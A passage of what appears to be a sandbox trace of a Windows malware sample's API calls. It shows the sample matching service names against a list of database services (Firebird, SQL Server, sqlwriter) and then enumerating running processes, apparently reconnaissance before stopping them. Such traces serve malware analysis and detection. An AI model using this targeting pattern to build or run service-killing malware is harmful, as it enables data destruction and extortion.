3 [0199.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0199.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0199.070] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0199.070] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0199.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0199.070] lstrlenW (lpString="MpsSvc") returned 6 [0199.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0199.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0199.070] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0199.071] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0199.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0199.071] lstrlenW (lpString="NcbService") returned 10 [0199.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0199.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0199.071] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0199.071] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0199.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0199.071] lstrlenW (lpString="netprofm") returned 8 [0199.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0199.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0199.071] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0199.071] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0199.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0199.071] lstrlenW (lpString="NlaSvc") returned 6 [0199.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0199.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0199.071] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0199.071] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0199.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0199.071] lstrlenW (lpString="nsi") returned 3 [0199.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0199.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0199.071] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0199.071] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0199.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0199.071] lstrlenW (lpString="PcaSvc") returned 6 [0199.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0199.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0199.072] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0199.072] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0199.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0199.072] lstrlenW (lpString="PlugPlay") returned 8 [0199.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0199.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0199.072] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0199.072] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0199.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0199.072] lstrlenW (lpString="Power") returned 5 [0199.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0199.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0199.072] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0199.072] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0199.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0199.072] lstrlenW (lpString="ProfSvc") returned 7 [0199.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0199.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0199.072] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0199.072] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0199.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0199.072] lstrlenW (lpString="RpcEptMapper") returned 12 [0199.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0199.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0199.072] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0199.072] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0199.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0199.072] lstrlenW (lpString="RpcSs") returned 5 [0199.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0199.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0199.073] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0199.073] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0199.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0199.073] lstrlenW (lpString="SamSs") returned 5 [0199.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0199.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0199.073] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0199.073] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0199.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0199.073] lstrlenW (lpString="Schedule") returned 8 [0199.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0199.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0199.073] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0199.073] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0199.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0199.073] lstrlenW (lpString="SecurityHealthService") returned 21 [0199.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0199.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0199.073] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0199.073] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0199.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0199.073] lstrlenW (lpString="SENS") returned 4 [0199.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0199.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0199.073] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0199.073] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0199.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0199.074] lstrlenW (lpString="ShellHWDetection") returned 16 [0199.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0199.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0199.074] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0199.074] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0199.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0199.074] lstrlenW (lpString="Spooler") returned 7 [0199.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0199.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0199.074] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0199.074] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0199.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0199.074] lstrlenW (lpString="sppsvc") returned 6 [0199.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0199.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0199.074] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0199.074] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0199.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0199.074] lstrlenW (lpString="SSDPSRV") returned 7 [0199.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0199.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0199.074] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0199.074] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0199.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3dc [0199.473] Process32FirstW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.475] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.476] lstrlenW (lpString="System") returned 6 [0199.476] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.477] lstrlenW (lpString="smss.exe") returned 8 [0199.477] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.478] lstrlenW (lpString="csrss.exe") returned 9 [0199.478] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.479] lstrlenW (lpString="wininit.exe") returned 11 [0199.479] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.497] lstrlenW (lpString="csrss.exe") returned 9 [0199.497] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.498] lstrlenW (lpString="winlogon.exe") returned 12 [0199.498] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.499] lstrlenW (lpString="services.exe") returned 12 [0199.499] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.500] lstrlenW (lpString="lsass.exe") returned 9 [0199.500] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.501] lstrlenW (lpString="svchost.exe") returned 11 [0199.501] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0199.502] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0199.502] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0199.503] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0199.503] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.504] lstrlenW (lpString="svchost.exe") returned 11 [0199.504] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.505] lstrlenW (lpString="dwm.exe") returned 7 [0199.505] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.506] lstrlenW (lpString="svchost.exe") returned 11 [0199.507] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.507] lstrlenW (lpString="svchost.exe") returned 11 [0199.508] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.509] lstrlenW (lpString="svchost.exe") returned 11 [0199.509] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.510] lstrlenW (lpString="svchost.exe") returned 11 [0199.510] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.511] lstrlenW (lpString="svchost.exe") returned 11 [0199.511] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.512] lstrlenW (lpString="svchost.exe") returned 11 [0199.512] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.513] lstrlenW (lpString="svchost.exe") returned 11 [0199.513] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.514] lstrlenW (lpString="svchost.exe") returned 11 [0199.514] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.515] lstrlenW (lpString="svchost.exe") returned 11 [0199.515] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.516] lstrlenW (lpString="spoolsv.exe") returned 11 [0199.517] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.517] lstrlenW (lpString="svchost.exe") returned 11 [0199.518] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.519] lstrlenW (lpString="svchost.exe") returned 11 [0199.519] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.520] lstrlenW (lpString="audiodg.exe") returned 11 [0199.520] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0199.521] lstrlenW (lpString="sihost.exe") returned 10 [0199.521] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.522] lstrlenW (lpString="svchost.exe") returned 11 [0199.522] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0199.523] lstrlenW (lpString="taskhostw.exe") returned 13 [0199.523] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0199.524] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0199.524] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0199.525] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0199.525] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.526] lstrlenW (lpString="explorer.exe") returned 12 [0199.526] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0199.527] lstrlenW (lpString="Memory Compression") returned 18 [0199.527] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0199.798] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0199.798] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0199.820] lstrlenW (lpString="SearchUI.exe") returned 12 [0199.820] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0199.821] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0199.821] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.822] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0199.822] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0199.823] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0199.823] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0199.824] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0199.824] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0199.829] lstrlenW (lpString="conhost.exe") returned 11 [0199.830] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0199.831] lstrlenW (lpString="roof competitive.exe") returned 20 [0199.831] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0199.832] lstrlenW (lpString="trustees.exe") returned 12 [0199.832] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0199.833] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0199.833] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0199.834] lstrlenW (lpString="isbn.exe") returned 8 [0199.834] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0199.835] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0199.835] Process32NextW (in: hSnapshot=0x3dc, 